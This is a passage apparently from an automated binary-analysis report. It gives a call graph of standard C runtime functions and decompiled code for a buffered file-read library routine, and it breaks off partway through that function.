7027->7026 7029 e14f39 __commit 7028->7029 7030 e136eb __setmbcp 58 API calls 7029->7030 7031 e14f43 7030->7031 7032 e1443f __lock 58 API calls 7031->7032 7033 e14f55 7031->7033 7038 e14f73 7032->7038 7034 e14f63 __commit 7033->7034 7036 e117ce __lock 58 API calls 7033->7036 7034->7006 7035 e14fa0 7078 e14fca 7035->7078 7036->7034 7038->7035 7039 e14841 _free 58 API calls 7038->7039 7039->7035 7041 e173f1 ___addlocaleref ___removelocaleref 7040->7041 7043 e173c5 7040->7043 7041->7043 7047 e1716c 7041->7047 7044 e173dd 7043->7044 7077 e145a9 LeaveCriticalSection 7044->7077 7046 e173e4 7046->7023 7048 e171e5 7047->7048 7055 e17181 7047->7055 7049 e17232 7048->7049 7050 e14841 _free 58 API calls 7048->7050 7051 e18d86 ___free_lc_time 58 API calls 7049->7051 7062 e1725b 7049->7062 7053 e17206 7050->7053 7054 e17250 7051->7054 7052 e171b2 7056 e171d0 7052->7056 7067 e14841 _free 58 API calls 7052->7067 7057 e14841 _free 58 API calls 7053->7057 7058 e14841 _free 58 API calls 7054->7058 7055->7048 7055->7052 7059 e14841 _free 58 API calls 7055->7059 7063 e14841 _free 58 API calls 7056->7063 7061 e17219 7057->7061 7058->7062 7065 e171a7 7059->7065 7060 e172ba 7066 e14841 _free 58 API calls 7060->7066 7068 e14841 _free 58 API calls 7061->7068 7062->7060 7076 e14841 58 API calls _free 7062->7076 7064 e171da 7063->7064 7069 e14841 _free 58 API calls 7064->7069 7070 e18c23 ___free_lconv_mon 58 API calls 7065->7070 7071 e172c0 7066->7071 7072 e171c5 7067->7072 7073 e17227 7068->7073 7069->7048 7070->7052 7071->7043 7074 e18d1f ___free_lconv_num 58 API calls 7072->7074 7075 e14841 _free 58 API calls 7073->7075 7074->7056 7075->7049 7076->7062 7077->7046 7081 e145a9 LeaveCriticalSection 7078->7081 7080 e14fd1 7080->7033 7081->7080 7083 e1200b LeaveCriticalSection 7082->7083 7084 e11fec 7082->7084 7083->6624 7084->7083 7085 e11ff3 7084->7085 7088 e145a9 LeaveCriticalSection 7085->7088 7087 e12008 7087->6624 7088->7087 7090 e114ae __commit 7089->7090 7091 e114f1 7090->7091 7092 e114e9 __commit 7090->7092 7097 e114c4 _memset 7090->7097 7102 e11f6e 7091->7102 7092->6572 7095 e11cd3 __cftoe_l 58 API calls 7098 e114de 7095->7098 7097->7095 7100 e11e99 __cftoe_l 9 API calls 7098->7100 7100->7092 7103 e11fa0 EnterCriticalSection 7102->7103 7104 e11f7e 7102->7104 7105 e114f7 7103->7105 7104->7103 7106 e11f86 7104->7106 7108 e112c2 7105->7108 7107 e1443f __lock 58 API calls 7106->7107 7107->7105 7111 e112dd _memset 7108->7111 7114 e112f8 7108->7114 7109 e112e8 7110 e11cd3 __cftoe_l 58 API calls 7109->7110 7112 e112ed 7110->7112 7111->7109 7111->7114 7119 e11338 7111->7119 7113 e11e99 __cftoe_l 9 API calls 7112->7113 7113->7114 7122 e1152b 7114->7122 7116 e11449 _memset 7120 e11cd3 __cftoe_l 58 API calls 7116->7120 7119->7114 7119->7116 7125 e12883 7119->7125 7132 e12a3a 7119->7132 7200 e12762 7119->7200 7220 e128a7 7119->7220 7120->7112 7123 e11fdd __wfsopen 2 API calls 7122->7123 7124 e11531 7123->7124 7124->7092 7126 e128a2 7125->7126 7127 e1288d 7125->7127 7126->7119 7128 e11cd3 __cftoe_l 58 API calls 7127->7128 7129 e12892 7128->7129 7130 e11e99 __cftoe_l 9 API calls 7129->7130 7131 e1289d 7130->7131 7131->7119 7133 e12a72 7132->7133 7134 e12a5b 7132->7134 7136 e131aa 7133->7136 7141 e12aac 7133->7141 7135 e11c9f __commit 58 API calls 7134->7135 7138 e12a60 7135->7138 7137 e11c9f __commit 58 API calls 7136->7137 7139 e131af 7137->7139 7140 e11cd3 __cftoe_l 58 API calls 7138->7140 7143 e11cd3 __cftoe_l 58 API calls 7139->7143 7181 e12a67 7140->7181 7142 e12ab4 7141->7142 7147 e12acb 7141->7147 7144 e11c9f __commit 58 API calls 7142->7144 7146 e12ac0 7143->7146 7145 e12ab9 7144->7145 7150 e11cd3 __cftoe_l 58 API calls 7145->7150 7148 e11e99 __cftoe_l 9 API calls 7146->7148 7149 e12ae0 7147->7149 7152 e12afa 7147->7152 7153 e12b18 7147->7153 7147->7181 7148->7181 7151 e11c9f __commit 58 API calls 7149->7151 7150->7146 7151->7145 7152->7149 7155 e12b05 7152->7155 7154 e148c1 __malloc_crt 58 API calls 7153->7154 7156 e12b28 7154->7156 7157 e16c44 __read_nolock 58 API calls 7155->7157 7158 e12b30 7156->7158 7159 e12b4b 7156->7159 7160 e12c19 7157->7160 7161 e11cd3 __cftoe_l 58 API calls 7158->7161 7163 e17064 __lseeki64_nolock 60 API calls 7159->7163 7162 e12c92 ReadFile 7160->7162 7167 e12c2f GetConsoleMode 7160->7167 7164 e12b35 7161->7164 7165 e13172 GetLastError 7162->7165 7166 e12cb4 7162->7166 7163->7155 7168 e11c9f __commit 58 API calls 7164->7168 7169 e12c72 7165->7169 7170 e1317f 7165->7170 7166->7165 7174 e12c84 7166->7174 7171 e12c43 7167->7171 7172 e12c8f 7167->7172 7168->7181 7177 e11cb2 __dosmaperr 58 API calls 7169->7177 7182 e12c78 7169->7182 7173 e11cd3 __cftoe_l 58 API calls 7170->7173 7171->7172 7175 e12c49 ReadConsoleW 7171->7175 7172->7162 7178 e13184 7173->7178 7174->7182 7183 e12ce9 7174->7183 7184 e12f56 7174->7184 7175->7174 7176 e12c6c GetLastError 7175->7176 7176->7169 7177->7182 7179 e11c9f __commit 58 API calls 7178->7179 7179->7182 7180 e14841 _free 58 API calls 7180->7181 7181->7119 7182->7180 7182->7181 7186 e12d55 ReadFile 7183->7186 7192 e12dd6 7183->7192 7184->7182 7187 e1305c ReadFile 7184->7187 7188 e12d76 GetLastError 7186->7188 7196 e12d80 7186->7196 7191 e1307f GetLastError 7187->7191 7199 e1308d 7187->7199 7188->7196 7189 e12e93 7194 e12e43 MultiByteToWideChar 7189->7194 7195 e17064 __lseeki64_nolock 60 API calls 7189->7195 7190 e12e83 7193 e11cd3 __cftoe_l 58 API calls 7190->7193 7191->7199 7192->7182 7192->7189 7192->7190 7192->7194 7193->7182 7194->7176 7194->7182 7195->7194 7196->7183 7197 e17064 __lseeki64_nolock 60 API calls 7196->7197 7197->7196 7198 e17064 __lseeki64_nolock 60 API calls 7198->7199 7199->7184 7199->7198 7201 e1276d 7200->7201 7204 e12782 7200->7204 7202 e11cd3 __cftoe_l 58 API calls 7201->7202 7203 e12772 7202->7203 7205 e11e99 __cftoe_l 9 API calls 7203->7205 7206 e127b7 7204->7206 7211 e1277d 7204->7211 7267 e165b7 7204->7267 7205->7211 7208 e12883 __flush 58 API calls 7206->7208 7209 e127cb 7208->7209 7234 e12926 7209->7234 7211->7119 7212 e127d2 7212->7211 7213 e12883 __flush 58 API calls 7212->7213 7214 e127f5 7213->7214 7214->7211 7215 e12883 __flush 58 API calls 7214->7215 7216 e12801 7215->7216 7216->7211 7217 e12883 __flush 58 API calls 7216->7217 7218 e1280e 7217->7218 7219 e12883 __flush 58 API calls 7218->7219 7219->7211 7221 e128b6 7220->7221 7230 e128b2 _memmove 7220->7230 7222 e128bd 7221->7222 7225 e128d0 _memset 7221->7225 7223 e11cd3 __cftoe_l 58 API calls 7222->7223 7224 e128c2 7223->7224 7226 e11e99 __cftoe_l 9 API calls 7224->7226 7227 e12907 7225->7227 7228 e128fe 7225->7228 7225->7230 7226->7230 7227->7230 7232 e11cd3 __cftoe_l 58 API calls 7227->7232 7229 e11cd3 __cftoe_l 58 API calls 7228->7229 7231 e12903 7229->7231 7230->7119 7233 e11e99 __cftoe_l 9 API calls 7231->7233 7232->7231 7233->7230 7235 e12932 __commit 7234->7235 7236 e12956 7235->7236 7237 e1293f 7235->7237 7238 e12a1a 7236->7238 7240 e1296a 7236->7240 7239 e11c9f __commit 58 API calls 7237->7239 7241 e11c9f __commit 58 API calls 7238->7241 7242 e12944 7239->7242 7244 e12995 7240->7244 7245 e12988 7240->7245 7246 e1298d 7241->7246 7243 e11cd3 __cftoe_l 58 API calls 7242->7243 7247 e1294b __commit 7243->7247 7249 e129a2 7244->7249 7250 e129b7 7244->7250 7248 e11c9f __commit 58 API calls 7245->7248 7251 e11cd3 __cftoe_l 58 API calls 7246->7251 7247->7212 7248->7246 7252 e11c9f __commit 58 API calls 7249->7252 7253 e16c98 ___lock_fhandle 59 API calls 7250->7253 7262 e129af 7251->7262 7255 e129a7 7252->7255 7254 e129bd 7253->7254 7256 e129d0 7254->7256 7257 e129e3 7254->7257 7258 e11cd3 __cftoe_l 58 API calls 7255->7258 7259 e12a3a __read_nolock 70 API calls 7256->7259 7261 e11cd3 __cftoe_l 58 API calls 7257->7261 7258->7262 7263 e129dc 7259->7263 7260 e11e99 __cftoe_l 9 API calls 7260->7247 7264 e129e8 7261->7264 7262->7260 7270 e12a12 7263->7270 7265 e11c9f __commit 58 API calls 7264->7265 7265->7263 7268 e148c1 __malloc_crt 58 API calls 7267->7268 7269 e165cc 7268->7269 7269->7206 7273 e1703e LeaveCriticalSection 7270->7273 7272 e12a18 7272->7247 7273->7272 7277 e11942 7274->7277 7276 e117e9 7278 e1194e __commit 7277->7278 7279 e1443f __lock 51 API calls 7278->7279 7280 e11955 7279->7280 7281 e11a0e __cinit 7280->7281 7282 e11983 DecodePointer 7280->7282 7297 e11a5c 7281->7297 7282->7281 7284 e1199a DecodePointer 7282->7284 7290 e119aa 7284->7290 7286 e11a6b __commit 7286->7276 7288 e119b7 EncodePointer 7288->7290 7289 e11a53 7291 e11a5c 7289->7291 7292 e117b8 __mtinitlocknum 3 API calls 7289->7292 7290->7281 7290->7288 7294 e119c7 DecodePointer EncodePointer 7290->7294 7293 e11a69 7291->7293 7302 e145a9 LeaveCriticalSection 7291->7302 7292->7291 7293->7276 7296 e119d9 DecodePointer DecodePointer 7294->7296 7296->7290 7298 e11a62 7297->7298 7299 e11a3c 7297->7299 7303 e145a9 LeaveCriticalSection 7298->7303 7299->7286 7301 e145a9 LeaveCriticalSection 7299->7301 7301->7289 7302->7293 7303->7299 7429 e12470 7430 e124a7 7429->7430 7431 e1249a 7429->7431 7433 e15780 __cftoe_l 6 API calls 7430->7433 7432 e15780 __cftoe_l 6 API calls 7431->7432 7432->7430 7435 e124b7 __except_handler4 7433->7435 7434 e125cf 7435->7434 7436 e12584 __except_handler4 7435->7436 7440 e1250e __IsNonwritableInCurrentImage 7435->7440 7436->7434 7437 e125bf 7436->7437 7439 e15780 __cftoe_l 6 API calls 7436->7439 7438 e15780 __cftoe_l 6 API calls 7437->7438 7438->7434 7439->7437 7447 e12732 RtlUnwind 7440->7447 7442 e125e6 7444 e15780 __cftoe_l 6 API calls 7442->7444 7443 e1254c __except_handler4 7443->7442 7445 e15780 __cftoe_l 6 API calls 7443->7445 7446 e125f6 __except_handler4 7444->7446 7445->7442 7447->7443 7943 e13293 IsProcessorFeaturePresent 7944 e132b9 7943->7944 7945 e1b313 7948 e1b324 7945->7948 7949 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7948->7949 7950 e1b336 7949->7950 7957 e1b7a1 7950->7957 7952 e1b342 7953 e1b356 7952->7953 7962 e1b633 7952->7962 7955 e1b7a1 __forcdecpt_l 65 API calls 7953->7955 7956 e1b320 7955->7956 7958 e1b7ad 7957->7958 7959 e1b7bf 7957->7959 7958->7952 7967 e1b65e 7959->7967 7963 e1b650 7962->7963 7964 e1b63f 7962->7964 7989 e1b5e1 7963->7989 7964->7952 7968 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7967->7968 7969 e1b671 7968->7969 7970 e1b6dd 7969->7970 7971 e1b67d 7969->7971 7975 e1b6fb 7970->7975 7986 e1918b 7970->7986 7978 e1b692 7971->7978 7979 e1c31c 7971->7979 7973 e11cd3 __cftoe_l 58 API calls 7976 e1b701 7973->7976 7975->7973 7975->7976 7977 e17927 ___crtLCMapStringA 62 API calls 7976->7977 7977->7978 7978->7952 7980 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7979->7980 7981 e1c32e 7980->7981 7982 e1918b __isleadbyte_l 58 API calls 7981->7982 7985 e1c33b 7981->7985 7983 e1c35f 7982->7983 7984 e17a65 ___crtGetStringTypeA 61 API calls 7983->7984 7984->7985 7985->7978 7987 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7986->7987 7988 e1919c 7987->7988 7988->7975 7990 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7989->7990 7991 e1b5f2 7990->7991 7992 e1b609 7991->7992 7993 e1c31c __isctype_l 61 API calls 7991->7993 7992->7952 7993->7992 7994 e14995 7995 e14998 7994->7995 7996 e17590 _abort 62 API calls 7995->7996 7997 e149a4 7996->7997 7609 e19634 7610 e1963c __cfltcvt_init 7609->7610 7611 e19647 7610->7611 7613 e1b3da 7610->7613 7619 e1c2bf 7613->7619 7615 e1b3ed 7616 e1b3f4 7615->7616 7617 e11ea9 __invoke_watson 8 API calls 7615->7617 7616->7611 7618 e1b400 7617->7618 7620 e1c2db __control87 7619->7620 7624 e1c2fb __control87 7619->7624 7621 e11cd3 __cftoe_l 58 API calls 7620->7621 7622 e1c2f1 7621->7622 7623 e11e99 __cftoe_l 9 API calls 7622->7623 7623->7624 7624->7615 7448 e116f7 7449 e11706 7448->7449 7450 e1170c 7448->7450 7452 e1188c _raise 58 API calls 7449->7452 7454 e117ea 7450->7454 7452->7450 7453 e11711 __commit 7455 e11942 _doexit 58 API calls 7454->7455 7456 e117f5 7455->7456 7456->7453 7625 e135b6 7626 e135c2 __commit 7625->7626 7627 e135db 7626->7627 7629 e136ca __commit 7626->7629 7630 e14841 _free 58 API calls 7626->7630 7628 e135ea 7627->7628 7631 e14841 _free 58 API calls 7627->7631 7632 e135f9 7628->7632 7633 e14841 _free 58 API calls 7628->7633 7630->7627 7631->7628 7634 e13608 7632->7634 7635 e14841 _free 58 API calls 7632->7635 7633->7632 7636 e13617 7634->7636 7638 e14841 _free 58 API calls 7634->7638 7635->7634 7637 e13626 7636->7637 7639 e14841 _free 58 API calls 7636->7639 7640 e14841 _free 58 API calls 7637->7640 7641 e13635 7637->7641 7638->7636 7639->7637 7640->7641 7642 e14841 _free 58 API calls 7641->7642 7644 e13647 7641->7644 7642->7644 7643 e1443f __lock 58 API calls 7647 e1364f 7643->7647 7644->7643 7645 e13672 7657 e136d6 7645->7657 7647->7645 7649 e14841 _free 58 API calls 7647->7649 7649->7645 7650 e1443f __lock 58 API calls 7655 e13686 ___removelocaleref 7650->7655 7651 e136b7 7660 e136e2 7651->7660 7654 e14841 _free 58 API calls 7654->7629 7655->7651 7656 e1716c ___freetlocinfo 58 API calls 7655->7656 7656->7651 7663 e145a9 LeaveCriticalSection 7657->7663 7659 e1367f 7659->7650 7664 e145a9 LeaveCriticalSection 7660->7664 7662 e136c4 7662->7654 7663->7659 7664->7662 7589 e11ed9 7590 e11ee1 7589->7590 7591 e14879 __calloc_crt 58 API calls 7590->7591 7592 e11efb 7591->7592 7593 e11f14 7592->7593 7594 e14879 __calloc_crt 58 API calls 7592->7594 7594->7593 7665 e1b2b9 7668 e1b2d1 7665->7668 7669 e1b2e2 7668->7669 7670 e1b2fb 7668->7670 7674 e19559 7669->7674 7683 e195e7 7670->7683 7673 e1b2cc 7675 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7674->7675 7676 e1957d 7675->7676 7686 e1a194 7676->7686 7681 e15780 __cftoe_l 6 API calls 7682 e195e3 7681->7682 7682->7673 7698 e194b5 7683->7698 7687 e1a1dc 7686->7687 7693 e1a1ec ___mtold12 7686->7693 7688 e11cd3 __cftoe_l 58 API calls 7687->7688 7689 e1a1e1 7688->7689 7690 e11e99 __cftoe_l 9 API calls 7689->7690 7690->7693 7691 e15780 __cftoe_l 6 API calls 7692 e19595 7691->7692 7694 e196b0 7692->7694 7693->7691 7696 e19708 7694->7696 7695 e15780 __cftoe_l 6 API calls 7697 e195a2 7695->7697 7696->7695 7697->7681 7699 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7698->7699 7700 e194e2 7699->7700 7701 e1a194 ___strgtold12_l 58 API calls 7700->7701 7702 e194fa 7701->7702 7707 e19c22 7702->7707 7705 e15780 __cftoe_l 6 API calls 7706 e19555 7705->7706 7706->7673 7710 e19c7a 7707->7710 7708 e15780 __cftoe_l 6 API calls 7709 e19517 7708->7709 7709->7705 7710->7708 7711 e1a93c 7714 e1a95d 7711->7714 7713 e1a958 7715 e1a9c7 7714->7715 7716 e1a968 7714->7716 7782 e1aeae 7715->7782 7716->7715 7718 e1a96d 7716->7718 7719 e1a972 7718->7719 7720 e1a98b 7718->7720 7728 e1b068 7719->7728 7721 e1a9ae 7720->7721 7724 e1a995 7720->7724 7769 e1a9e3 7721->7769 7747 e1b129 7724->7747 7727 e1a9ac 7727->7713 7799 e1c12f 7728->7799 7731 e1b0ad 7734 e1b0c5 7731->7734 7735 e1b0b5 7731->7735 7732 e1b09d 7733 e11cd3 __cftoe_l 58 API calls 7732->7733 7737 e1b0a2 7733->7737 7811 e1bfb7 7734->7811 7736 e11cd3 __cftoe_l 58 API calls 7735->7736 7738 e1b0ba 7736->7738 7740 e11e99 __cftoe_l 9 API calls 7737->7740 7741 e11e99 __cftoe_l 9 API calls 7738->7741 7743 e1b0a9 7740->7743 7741->7743 7742 e1b0f8 7742->7743 7820 e1af7c 7742->7820 7745 e15780 __cftoe_l 6 API calls 7743->7745 7746 e1a986 7745->7746 7746->7713 7748 e1c12f __fltout2 58 API calls 7747->7748 7749 e1b157 7748->7749 7750 e1b171 7749->7750 7751 e1b15e 7749->7751 7752 e1b179 7750->7752 7753 e1b18c 7750->7753 7754 e11cd3 __cftoe_l 58 API calls 7751->7754 7755 e11cd3 __cftoe_l 58 API calls 7752->7755 7758 e1bfb7 __fptostr 58 API calls 7753->7758 7756 e1b163 7754->7756 7757 e1b17e 7755->7757 7759 e11e99 __cftoe_l 9 API calls 7756->7759 7760 e11e99 __cftoe_l 9 API calls 7757->7760 7761 e1b1b8 7758->7761 7762 e1b16a 7759->7762 7760->7762 7761->7762 7764 e1b1fe 7761->7764 7767 e1b1d8 7761->7767 7763 e15780 __cftoe_l 6 API calls 7762->7763 7766 e1b224 7763->7766 7849 e1ad5d 7764->7849 7766->7727 7768 e1af7c __cftof2_l 58 API calls 7767->7768 7768->7762 7770 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7769->7770 7771 e1aa08 7770->7771 7772 e1aa1f 7771->7772 7773 e1aa28 7771->7773 7774 e11cd3 __cftoe_l 58 API calls 7772->7774 7776 e1aa31 7773->7776 7779 e1aa45 7773->7779 7775 e1aa24 7774->7775 7778 e11e99 __cftoe_l 9 API calls 7775->7778 7777 e11cd3 __cftoe_l 58 API calls 7776->7777 7777->7775 7781 e1aa40 _memset __alldvrm __cftoa_l _strrchr 7778->7781 7779->7781 7881 e1ad3f 7779->7881 7781->7727 7783 e1c12f __fltout2 58 API calls 7782->7783 7784 e1aee0 7783->7784 7785 e1aef7 7784->7785 7786 e1aee7 7784->7786 7787 e1af08 7785->7787 7788 e1aefe 7785->7788 7789 e11cd3 __cftoe_l 58 API calls 7786->7789 7792 e1bfb7 __fptostr 58 API calls 7787->7792 7790 e11cd3 __cftoe_l 58 API calls 7788->7790 7791 e1aeec 7789->7791 7790->7791 7793 e11e99 __cftoe_l 9 API calls 7791->7793 7794 e1af48 7792->7794 7795 e1aef3 7793->7795 7794->7795 7796 e1ad5d __cftoe2_l 58 API calls 7794->7796 7797 e15780 __cftoe_l 6 API calls 7795->7797 7796->7795 7798 e1af78 7797->7798 7798->7727 7800 e1c158 ___dtold 7799->7800 7827 e1c3cd 7800->7827 7805 e1c1b0 7807 e11ea9 __invoke_watson 8 API calls 7805->7807 7806 e1c19a 7808 e15780 __cftoe_l 6 API calls 7806->7808 7810 e1c1bc 7807->7810 7809 e1b096 7808->7809 7809->7731 7809->7732 7812 e1bfc9 7811->7812 7813 e1bfdf 7811->7813 7814 e11cd3 __cftoe_l 58 API calls 7812->7814 7813->7812 7815 e1bfe5 7813->7815 7818 e1bfce 7814->7818 7817 e11cd3 __cftoe_l 58 API calls 7815->7817 7819 e1bfd8 _memmove _strlen 7815->7819 7816 e11e99 __cftoe_l 9 API calls 7816->7819 7817->7818 7818->7816 7819->7742 7821 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7820->7821 7822 e1af99 7821->7822 7823 e11cd3 __cftoe_l 58 API calls 7822->7823 7826 e1afb5 _memset __shift 7822->7826 7824 e1afab 7823->7824 7825 e11e99 __cftoe_l 9 API calls 7824->7825 7825->7826 7826->7743 7830 e1c422 7827->7830 7828 e1c494 7831 e1b7cd _$I10_OUTPUT 58 API calls 7828->7831 7829 e15780 __cftoe_l 6 API calls 7832 e1c173 7829->7832 7830->7828 7833 e1c4ad 7830->7833 7839 e1c434 7830->7839 7831->7839 7840 e1b7cd 7832->7840 7836 e1b7cd _$I10_OUTPUT 58 API calls 7833->7836 7834 e1cd69 7837 e11ea9 __invoke_watson 8 API calls 7834->7837 7835 e1c445 7835->7829 7836->7839 7838 e1cda0 7837->7838 7839->7834 7839->7835 7841 e1b7d8 7840->7841 7843 e1b7e6 7840->7843 7841->7843 7847 e1b7fc 7841->7847 7842 e11cd3 __cftoe_l 58 API calls 7844 e1b7ed 7842->7844 7843->7842 7845 e11e99 __cftoe_l 9 API calls 7844->7845 7846 e1b7f7 7845->7846 7846->7805 7846->7806 7847->7846 7848 e11cd3 __cftoe_l 58 API calls 7847->7848 7848->7844 7850 e14c0c _LocaleUpdate::_LocaleUpdate 58 API calls 7849->7850 7851 e1ad70 7850->7851 7852 e1ad7d 7851->7852 7853 e1ad86 7851->7853 7854 e11cd3 __cftoe_l 58 API calls 7852->7854 7856 e1ad9b 7853->7856 7859 e1adaf __shift 7853->7859 7855 e1ad82 7854->7855 7858 e11e99 __cftoe_l 9 API calls 7855->7858 7857 e11cd3 __cftoe_l 58 API calls 7856->7857 7857->7855 7865 e1adaa _memmove 7858->7865 7860 e1b7cd _$I10_OUTPUT 58 API calls 7859->7860 7861 e1ae26 7860->7861 7862 e11ea9 __invoke_watson 8 API calls 7861->7862 7861->7865 7863 e1aead 7862->7863 7864 e1c12f __fltout2 58 API calls 7863->7864 7866 e1aee0 7864->7866 7865->7762 7867 e1aef7 7866->7867 7868 e1aee7 7866->7868 7869 e1af08 7867->7869 7870 e1aefe 7867->7870 7871 e11cd3 __cftoe_l 58 API calls 7868->7871 7874 e1bfb7 __fptostr 58 API calls 7869->7874 7872 e11cd3 __cftoe_l 58 API calls 7870->7872 7873 e1aeec 7871->7873 7872->7873 7875 e11e99 __cftoe_l 9 API calls 7873->7875 7876 e1af48 7874->7876 7877 e1aef3 7875->7877 7876->7877 7878 e1ad5d __cftoe2_l 58 API calls 7876->7878 7879 e15780 __cftoe_l 6 API calls 7877->7879 7878->7877 7880 e1af78 7879->7880 7880->7762 7882 e1aeae __cftoe_l 58 API calls 7881->7882 7883 e1ad58 7882->7883 7883->7781

              Executed Functions

              Function 00E112C2 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 e112c2-e112db 1 e112f8 0->1 2 e112dd-e112e2 0->2 3 e112fa-e11300 1->3 2->1 4 e112e4-e112e6 2->4 5 e11301-e11306 4->5 6 e112e8-e112ed call e11cd3 4->6 8 e11314-e11318 5->8 9 e11308-e11312 5->9 14 e112f3 call e11e99 6->14 12 e11328-e1132a 8->12 13 e1131a-e11325 call e11540 8->13 9->8 11 e11338-e11347 9->11 17 e11349-e1134c 11->17 18 e1134e 11->18 12->6 16 e1132c-e11336 12->16 13->12 14->1 16->6 16->11 19 e11353-e11358 17->19 18->19 22 e11441-e11444 19->22 23 e1135e-e11365 19->23 22->3 24 e11367-e1136f 23->24 25 e113a6-e113a8 23->25 24->25 26 e11371 24->26 27 e11412-e11413 call e12762 25->27 28 e113aa-e113ac 25->28 29 e11377-e11379 26->29 30 e1146f 26->30 39 e11418-e1141c 27->39 32 e113d0-e113db 28->32 33 e113ae-e113b6 28->33 36 e11380-e11385 29->36 37 e1137b-e1137d 29->37 38 e11473-e1147c 30->38 34 e113dd 32->34 35 e113df-e113e2 32->35 40 e113c6-e113ca 33->40 41 e113b8-e113c4 33->41 34->35 43 e113e4-e113f0 call e12883 call e12a3a 35->43 44 e11449-e1144d 35->44 36->44 45 e1138b-e113a4 call e128a7 36->45 37->36 38->3 39->38 46 e1141e-e11423 39->46 42 e113cc-e113ce 40->42 41->42 42->35 61 e113f5-e113fa 43->61 48 e1145f-e1146a call e11cd3 44->48 49 e1144f-e1145c call e11540 44->49 60 e11407-e11410 45->60 46->44 47 e11425-e11436 46->47 52 e11439-e1143b 47->52 48->14 49->48 52->22 52->23 60->52 62 e11481-e11485 61->62 63 e11400-e11403 61->63 62->38 63->30 64 e11405 63->64 64->60
              C-Code - Quality: 69%
              			E00E112C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00E11540(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00E12762(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00E11540(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00E11CD3())) = 0x22;
												L4:
												E00E11E99();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00E12883(_t119)); // executed
											_t88 = E00E12A3A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00E128A7(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
